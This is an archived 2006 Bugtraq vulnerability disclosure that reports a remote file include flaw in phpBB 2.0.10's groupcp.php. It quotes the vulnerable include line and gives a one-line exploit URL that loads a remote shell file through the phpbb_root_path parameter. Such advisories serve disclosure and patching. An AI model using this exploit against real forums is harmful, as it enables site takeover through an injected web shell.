| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <BAY105-F34CE29D1DA1D0F04AE6FB2C20F0@phx.gbl> Date: Wed, 18 Oct 2006 12:00:31 +0000 From: "mahmood ali" <mah_k_2000@...mail.com> To: bugtraq@...urityfocus.com, submit@...w0rm.com Subject: PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability ########################################### PhpBB<=2.0.10 (groupcp.php) Remote File Include Vulnerability ########################################### Source Code: http://www.comscripts.com/jump.php?action=script&id=666 ########################################### Vulnerable Code:_ include($phpbb_root_path . 'includes/page_header.'.$phpEx); ; ########################################### Exploit : http://www.vicTim.com/[PhpBB]/groupcp.php?phpbb_root_path=shell.txt? ########################################### Discoverd By : Mahmood_ali Conatact : mah_k_2000@...mail.com ########################################### Special Greetings :_ Tryag-Team ########################################### _________________________________________________________________ Windows Live™ Messenger has arrived. Click here to download it for free! http://imagine-msn.com/messenger/launch80/?locale=en-gb
Powered by blists - more mailing lists